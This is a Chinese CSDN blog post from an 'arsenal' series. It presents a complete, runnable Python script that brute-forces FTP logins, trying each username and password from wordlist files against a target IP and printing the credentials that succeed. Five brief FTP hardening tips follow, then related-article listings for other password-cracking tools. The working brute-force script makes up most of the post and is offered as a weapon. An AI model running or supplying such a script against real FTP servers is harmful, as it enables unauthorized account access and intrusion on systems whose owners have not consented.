#我的武器库系列#之Ftp爆破核心实现

最新推荐文章于 2024-05-18 00:37:32 发布
最新推荐文章于 2024-05-18 00:37:32 发布
阅读量420 收藏 1
点赞数
分类专栏: python 渗透攻击 文章标签: python ftp爆破 ftp爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a59a59/article/details/94621448
版权

        本篇是关于ftp的爆破实现。ftp爆破实现原理非常简单,利用ftplib组件,通过读取字典表username及password逐一尝试登录。

一、源代码

#-*- coding:utf8 -*-
import ftplib

def crackhandle(host,username,password):
    try:
        ftp = ftplib.FTP(host);
        ftp.login(username,password);
        ftp.quit();
        return True;
    except Exception as e:
        print("login fail! username is %s password is %s" % (username,password));
        pass;

def crack():
    host ="192.168.1.108";
    passwordsList = open("/root/Desktop/pythonTest/password.txt");
    usernamesList = open("/root/Desktop/pythonTest/username.txt");
    passwords = passwordsList.readlines();
    usernames = usernamesList.readlines();
    switch = False;
    for usuername in usernames:
        username = usuername.strip();
        for password in passwords:
            password = password.strip();
            recv = crackhandle(host,str(username),str(password));
            if recv:
                print("success userName is %s password is %s" % (username,password));
                switch = True;
                break;
        if switch:
            break;
crack();

运行指令:python ftpcrack.py

效果图如下,可见通过爆破成功。

二、关于ftp的安全提升

    1.从本地安全策略进行登录错误设置;

    2.使用SSL加密;

    3.用户权限设置合理化;

    4.用户名及密码避免简单化;

    5.匿名访问按需开启;

登峰造Geek
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络安全 批量ftp暴力破解脚本 弱口令漏洞
04-21
批量ftp爆破的脚本,支持多线程,也不长
2021-10-15 ftp爆破
夕阳的街道的博客
10-15 3828
一、实验题目: ftp爆破 二、实验内容: 使用Hydra工具和口令字典进行ftp爆破 三、环境准备: (1)kali虚拟机 (2)Metasploitable靶机 四、实验步骤: (1)在kali中创建账号字典和密码字典(存放位置可自定义): 命令: touch /home/kali/Desktop/user.txt(账号字典) touch /home/kali/De...
ftp爆破FunboxLunchbreaker
tpaer的博客
10-07 777
一次简单的爆破通关。
Windows应急响应(三 FTP暴力破解)
weixin_43781139的博客
11-09 1402
0x00 前言 ​ FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传webshell,进一步渗透提权,直至控制整个网站服务器。 0x01 应急场景 ​ 从昨天开始,网站响应速度变得缓慢,网站服务器登录上去非常卡,重启服务器就能保证一段时间的正常访问,网站响应状态时而飞快时而缓慢,多数时间是缓慢的。针对网站服务器异常,系统日志和网站日志,是我们排查处理的重点。查...
Python渗透测试编程技术------FTP暴力破解模块实验(二)
dyx0910的博客
04-28 972
Python渗透测试编程技术------FTP暴力破解模块实验(二)
企业内网安全防范WannaCry及NSA武器库指南
05-15
今日(2017-05-15),360官方紧急发布了一个企业内网安全防范WannaCry及NSA武器库指南,赶紧对照指南进行内网安全防护吧!!
CTF PWN 武器库
12-12
"CTF PWN 武器库题"通常指的是这类竞赛中的一个问题,挑战者需要利用编程技巧来解决安全漏洞,获取系统的控制权。在这个特定的案例中,我们面对的题目是"rifle",它涉及到fastbin堆溢出,这是一种常见的内存管理漏洞...
悬剑武器库内部日刊.zip
07-11
悬剑武器库团队内部日刊
Trilha-Node-JS-Ignite:武器库武器库
03-31
Trilha-Node-JS-Ignite:武器库武器库
ftp爆破工具
07-25
支持多线程, 自定义字典, 下载时建议关掉查杀工具 Usage: ftpscan [Thread] Example: ftpscan 10.0.0.1-10.0.0.254 200
kali使用hydra工具进行ssh、ftp等密码爆破
热门推荐
l578900的博客
09-02 1万+
1、实验环境: Centos和kali均处于nat模式,centos联网,centos的ip:192.168.136.142 并且kali可以ping通centos 2、准备开始破解密码,给centos设立一个弱密码,并且kali具有字典wordlist.TXT 3、确定centos支持远程登录ssh(查看端口号,ssh的端口号是22),并且开始对文件进行追踪 输入命令:netstat -antpl (t表示:tcp , p表示:进程号pid , l表示:监听) 输入
FTP爆破攻击:使用Python脚本快速测试FTP服务器的安全性
weixin_43263566的博客
05-30 1844
使用Python脚本进行FTP暴力破解
口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解
薛定谔的猫
04-12 5313
服务器收到请求之后,先在该服务器上你的主目录下寻找你的公用密匙,然后把它和你发送过来的公用密匙进行比较。同时如果服务器没有其他安全限制,如登录来源IP,账户登录错误次数,则会可能存在被暴力破解的可能。打开kali-linux命令行窗口,输入ssh admin@193.168.1.26,任意输入用户名密码,提示访问被阻止。尝试登录FTP服务器,打开kali系统终端,输入ftp 193.168.1.23,随后输入上面获取的用户名和密码。输入search ftp_login,搜索ftp_login模块。
rdp、ftp协议的密码爆破
过期的秋刀鱼
08-02 753
远程桌面 rdp协议 3389文件传输 FTP协议 20 21攻击方:Kali测试方:Win7两台都要在同一网段。
应急响应实战笔记——Windows实战篇:① FTP暴力破解
君逍遥o
04-07 853
FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传webshell,进一步渗透提权,直至控制整个网站服务器。
Python 渗透测试:FTP 文件传输 爆破.(21端口)
网络安全领域___专研者.
05-18 696
文件传输是指在计算机网络中将数据从一个位置传输到另一个位置的过程。文件传输爆破是一种黑客攻击手段,主要针对文件传输系统的漏洞进行暴力破解.
ftp服务暴力破解
m0_71366428的博客
12-14 900
暴力破解漏洞的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息,如用户名、密码、短信验证码等。暴力破解的关键在于字典的大小及字典是否具有针对性,如登录时,需要输入4位数字的短信验证码,那么暴力破解的范围就是0000~9999。
Linux 具备武器库 镜像下载
最新发布
07-03
Linux 操作系统因其开源和灵活性而被广泛采用,确实拥有丰富的软件武器库,这些软件通常被称为软件包或镜像。Linux 官方的主要发行版如Ubuntu、Debian、CentOS等都有自己的软件仓库,用户可以通过这些仓库下载预配置好的软件包(也称为应用软件或二进制软件)。 例如,在Ubuntu中,你可以使用apt-get或apt命令从`Ubuntu软件中心`下载各种应用程序,比如浏览器、办公套件、开发工具等。而在Debian系的系统上,则可以使用apt或aptitude从`Debian软件包仓库`获取软件。 对于源代码管理,Linux社区也依赖于像GitHub、GitLab这样的代码托管平台,开发者可以直接从源码编译安装,这为高级用户提供了更多的定制选项。 此外,还有一些第三方镜像网站,如阿里云的Apt Repository、清华大学开源软件镜像站等,提供Linux发行版的各种软件包镜像,方便国内用户加速下载速度。 下载Linux镜像通常是用于新系统的初始化设置,或者是想要创建可启动USB/CD/DVD来进行安装或者迁移的操作。常用的镜像文件格式有ISO、IMG等,可以从各发行版官网的下载页面找到对应版本的安装镜像。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

登峰造Geek

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值